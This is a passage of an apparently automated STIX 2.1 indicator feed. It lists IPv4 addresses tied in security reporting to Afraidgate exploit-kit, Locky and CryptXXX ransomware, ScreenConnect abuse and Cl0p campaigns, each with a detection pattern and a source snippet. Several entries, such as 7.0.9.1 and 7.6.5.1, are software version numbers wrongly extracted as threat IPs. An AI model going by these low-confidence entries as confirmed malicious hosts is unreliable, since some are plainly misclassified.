42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7f4f0b8c-7171-41e4-8bf1-d0f98010c9a0","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 207.182.148.92","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: bloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - o","pattern":"[ipv4-addr:value = '207.182.148.92']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b0cbef08-8bb4-4238-86a8-c23f4600ecdd","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 209.126.120.8","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: .97 port 80 - reikleivn-azarashi.orlandohomesbydevito[.]com 209.126.120.8 port 80 - litigators.esteroscreen[.]com Bedep post-infectio","pattern":"[ipv4-addr:value = '209.126.120.8']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--351e3a5c-b08a-4e7e-b421-e1d706da5cd1","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 217.23.6.40","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: mjobrkn3[.]eu (using a VM) CryptXXX post-infection traffic: 217.23.6.40 port 443 (custom encoding)","pattern":"[ipv4-addr:value = '217.23.6.40']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc44d3d9-3eb4-47d6-922e-fdddeca65fc1","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.199.141.203","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: yfczmludodohkdqnij[.]com (using a VM) Click-fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - ceti","pattern":"[ipv4-addr:value = '5.199.141.203']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bd8a6062-111a-43e8-bfde-e3dc5c324158","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.25.160.124","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: et.jacquieleebrasil.com[.]br - GET /js/script.js Angler EK: 85.25.160.124 port 80 - bintiye.helpthevets[.]org 85.25.160.124 port 80 -","pattern":"[ipv4-addr:value = '85.25.160.124']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60f829bd-39c7-4db3-8499-b66bfc436c58","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.25.79.211","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: ici[.]com 207.182.148.92 port 80 - allofuslikesforums[.]com 85.25.79.211 port 80 - oqpwldjc.mjobrkn3[.]eu (using a VM) CryptXXX post","pattern":"[ipv4-addr:value = '85.25.79.211']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--057e318f-f4b2-4945-9c61-89cf57499522","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 93.190.141.27","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: fraud traffic: 5.199.141.203 port 80 - ranetardinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - ted","pattern":"[ipv4-addr:value = '93.190.141.27']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f464d6ad-4c09-4ed0-80eb-a0394b4dabe6","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 95.211.205.218","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: rdinghap[.]com 93.190.141.27 port 80 - cetinhechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - rero","pattern":"[ipv4-addr:value = '95.211.205.218']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8b7e39a5-9b4a-42e0-8de8-215f0e0e87a8","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 95.211.205.228","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 - yfczmludodohkdqnij[.]com (using a VM) Click-fraud","pattern":"[ipv4-addr:value = '95.211.205.228']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f367874d-bc93-4365-81f8-d31cafea9afe","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.117.153.176","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: 50.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.117.153.176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185.","pattern":"[ipv4-addr:value = '185.117.153.176']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--39bd3caf-7b15-4819-970a-38e74195a9a2","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.118.66.83","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: .176 port 80 - 185.117.153.176 - POST /upload/_dispatch.php 185.118.66.83 port 80 - 185.118.66.83 - POST /upload/_dispatch.php Domain","pattern":"[ipv4-addr:value = '185.118.66.83']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b98735d9-9466-46bb-b73b-aacdcd091a5d","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.140.33.76","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: ored[.]top 5.2.72.236 port 80 - yegoxmvzpx.bsuperpink[.]top 185.140.33.76 port 80 - erfxsnvj.mafterred[.]top 185.140.33.76 port 80 -","pattern":"[ipv4-addr:value = '185.140.33.76']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a14f9a02-5e12-4e56-b119-bc0ed48e1004","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.140.33.99","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: rred[.]top 185.140.33.76 port 80 - hxmst.rautumngreen[.]top 185.140.33.99 port 80 - bkhrdfngwg.blueelizabeth[.]top 185.140.33.99 port","pattern":"[ipv4-addr:value = '185.140.33.99']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f7f4dded-b017-48e3-8c7c-1c8c1653694e","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.5.250.135","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: 54.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5.250.135 port 80 - 185.5.250.135 - POST /upload/_dispatch.php 185.11","pattern":"[ipv4-addr:value = '185.5.250.135']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05006c25-bb42-41be-85a5-4000d4323d19","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 188.166.38.125","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: 1 port 80 - start.puterasyawal[.]com - GET /js/addOnLoad.js 188.166.38.125 port 80 - nepal.laderatutors[.]com - GET /rokmediaqueries.j","pattern":"[ipv4-addr:value = '188.166.38.125']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4150f679-b43f-449d-805a-06155bd5849f","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 46.101.26.161","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: compromise associated with the Afraidgate campaign: Gates: 46.101.26.161 port 80 - leon.stmaryschooldmt[.]com - GET /scripts/jquery.","pattern":"[ipv4-addr:value = '46.101.26.161']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4313ea2e-9cc5-4d2b-99f7-4268aef57e32","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.187.0.137","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: .253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.5","pattern":"[ipv4-addr:value = '5.187.0.137']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2acbdc67-713d-4b58-91d3-83fbdbb5123d","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.2.72.114","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: .yintored[.]top 5.2.72.236 port 80 - bkubf.bsuperpink[.]top 5.2.72.114 port 80 - iynwzttqd.hautumngreen[.]top 5.2.72.236 port 80 -","pattern":"[ipv4-addr:value = '5.2.72.114']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c77357eb-c113-4a66-924a-169c63831733","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.2.72.236","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: zine.polatoglumimarlik[.]com - GET /to_top.js Neutrino EK: 5.2.72.236 port 80 - avukytj.oautumnyellow[.]top 5.2.72.236 port 80 -","pattern":"[ipv4-addr:value = '5.2.72.236']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--768ead5f-83bf-4015-ae2b-a7603b8e4a8a","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 5.9.253.173","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: rklfdprel.blueelizabeth[.]top Locky post-infection traffic: 5.9.253.173 port 80 - 5.9.253.173 - POST /upload/_dispatch.php 5.187.0.","pattern":"[ipv4-addr:value = '5.9.253.173']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--16d16ed1-aade-4265-a0d0-2352f040e455","created":"2026-08-17T09:47:54.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 77.222.54.202","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Switches from CryptXXX Ransomware Back to Locky\" (Palo Alto Unit 42). Context: 87.0.137 port 80 - 5.187.0.137 - POST /upload/_dispatch.php 77.222.54.202 port 80 - 77.222.54.202 - POST /upload/_dispatch.php 185.5.","pattern":"[ipv4-addr:value = '77.222.54.202']","pattern_type":"stix","valid_from":"2026-08-17T09:47:54.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-afraidgate-major-exploit-kit-campaign-switches-from-cryptxxx-ransomware-back-to-locky/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81c49711-aa31-470f-8ca1-f04d315fb298","created":"2026-08-09T11:05:08.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 207.174.0.143","description":"Seen in \"SMOKE#SCREEN Campaign Abuses ScreenConnect to Give Attackers Remote Control Access\" (Security Affairs). Context: timately pointing to a live WsgiDAV-based staging server at 207.174.0.143:8080.” reads the report published by Securonix. “Victims wh","pattern":"[ipv4-addr:value = '207.174.0.143']","pattern_type":"stix","valid_from":"2026-08-09T11:05:08.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196637/hacking/smokescreen-campaign-abuses-screenconnect-to-give-attackers-remote-control-access.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a1313426-e068-400b-8255-a53521ef046b","created":"2026-08-06T16:41:29.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.0.9.1","description":"Seen in \"Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data\" (The Hacker News). Context: FMC Software - 7.0 - Cisco_Firepower_Mgmt_Center_Hotfix_GB-7.0.9.1-3.sh.REL.tar 7.2 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.","pattern":"[ipv4-addr:value = '7.0.9.1']","pattern_type":"stix","valid_from":"2026-08-06T16:41:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/cisco-fmc-zero-day-actively-exploited.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ebb301ae-6dc5-4c1d-85b2-61a68261c790","created":"2026-08-06T16:41:29.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.2.11.1","description":"Seen in \"Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data\" (The Hacker News). Context: .1-3.sh.REL.tar 7.2 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HL-7.2.11.1-4.sh.REL.tar 7.4 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.","pattern":"[ipv4-addr:value = '7.2.11.1']","pattern_type":"stix","valid_from":"2026-08-06T16:41:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/cisco-fmc-zero-day-actively-exploited.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--de0e1cb3-cf1f-47b6-9590-0fe113219bd2","created":"2026-08-06T16:41:29.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.4.7.1","description":"Seen in \"Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data\" (The Hacker News). Context: .1-4.sh.REL.tar 7.4 - Cisco_Secure_FW_Mgmt_Center_Hotfix_HG-7.4.7.1-3.sh.REL.tar 7.6 - Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.","pattern":"[ipv4-addr:value = '7.4.7.1']","pattern_type":"stix","valid_from":"2026-08-06T16:41:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/cisco-fmc-zero-day-actively-exploited.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2ff1b4f3-7ce8-486b-951d-a2b767f62634","created":"2026-08-06T16:41:29.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.6.5.1","description":"Seen in \"Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data\" (The Hacker News). Context: .1-3.sh.REL.tar 7.6 - Cisco_Secure_FW_Mgmt_Center_Hotfix_CY-7.6.5.1-2.sh.REL.tar 7.7 - Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.","pattern":"[ipv4-addr:value = '7.6.5.1']","pattern_type":"stix","valid_from":"2026-08-06T16:41:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/cisco-fmc-zero-day-actively-exploited.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--42be9e4b-257d-41ee-b029-f3fefd232922","created":"2026-08-06T16:41:29.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 7.7.12.1","description":"Seen in \"Cisco FMC Zero-Day Actively Exploited, Static Credentials Could Expose Sensitive Data\" (The Hacker News). Context: .1-2.sh.REL.tar 7.7 - Cisco_Secure_FW_Mgmt_Center_Hotfix_AM-7.7.12.1-2.sh.REL.tar 10.0 - Cisco_Secure_FW_Mgmt_Center_Hotfix_P-10","pattern":"[ipv4-addr:value = '7.7.12.1']","pattern_type":"stix","valid_from":"2026-08-06T16:41:29.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/cisco-fmc-zero-day-actively-exploited.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ddfd964d-374a-4e76-b0d4-1be2c186d2be","created":"2026-08-05T15:24:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 206.72.242.124","description":"Seen in \"U.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog\" (Security Affairs). Context: shed three IP addresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to block them and ch","pattern":"[ipv4-addr:value = '206.72.242.124']","pattern_type":"stix","valid_from":"2026-08-05T15:24:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196130/security/u-s-cisa-adds-arista-velocloud-orchestrator-and-fortinet-fortios-flaws-to-its-known-exploited-vulnerabilities-catalog.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f4a0d422-b0ea-4e0f-a4ec-b107a25311d5","created":"2026-08-05T15:24:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 206.72.242.162","description":"Seen in \"U.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog\" (Security Affairs). Context: dresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to block them and check logs for sig","pattern":"[ipv4-addr:value = '206.72.242.162']","pattern_type":"stix","valid_from":"2026-08-05T15:24:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196130/security/u-s-cisa-adds-arista-velocloud-orchestrator-and-fortinet-fortios-flaws-to-its-known-exploited-vulnerabilities-catalog.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3461e4d3-76dd-4a78-8712-68293e8c8186","created":"2026-08-05T15:24:33.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.19.75.217","description":"Seen in \"U.S. CISA adds Arista VeloCloud Orchestrator and Fortinet FortiOS flaws to its Known Exploited Vulnerabilities catalog\" (Security Affairs). Context: ny also published three IP addresses linked to the attacks (8.19.75.217, 206.72.242.124, 206.72.242.162) and advised customers to b","pattern":"[ipv4-addr:value = '8.19.75.217']","pattern_type":"stix","valid_from":"2026-08-05T15:24:33.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/196130/security/u-s-cisa-adds-arista-velocloud-orchestrator-and-fortinet-fortios-flaws-to-its-known-exploited-vulnerabilities-catalog.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--853975f0-1afa-4aed-9ed9-a53733db6835","created":"2026-08-03T16:06:16.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.243.35.63","description":"Seen in \"Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE\" (The Hacker News). Context: match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion emails appear to originate from p","pattern":"[ipv4-addr:value = '104.243.35.63']","pattern_type":"stix","valid_from":"2026-08-03T16:06:16.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/cl0p-affiliates-target-internet-exposed.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--72769d74-49be-4f68-97a8-628975af5412","created":"2026-08-03T16:06:16.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 216.152.148.54","description":"Seen in \"Cl0p Affiliates Target Internet-Exposed PTC Windchill and FlexPLM with Unauthenticated RCE\" (The Hacker News). Context: compromise (IoCs), all of which match those shared by PTC - 216.152.148.54 216.152.151.204 104.243.35.63 5.180.41.35 The extortion ema","pattern":"[ipv4-addr:value = '216.152.148.54']","pattern_type":"stix","valid_from":"2026-08-03T16:06:16.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"The Hacker 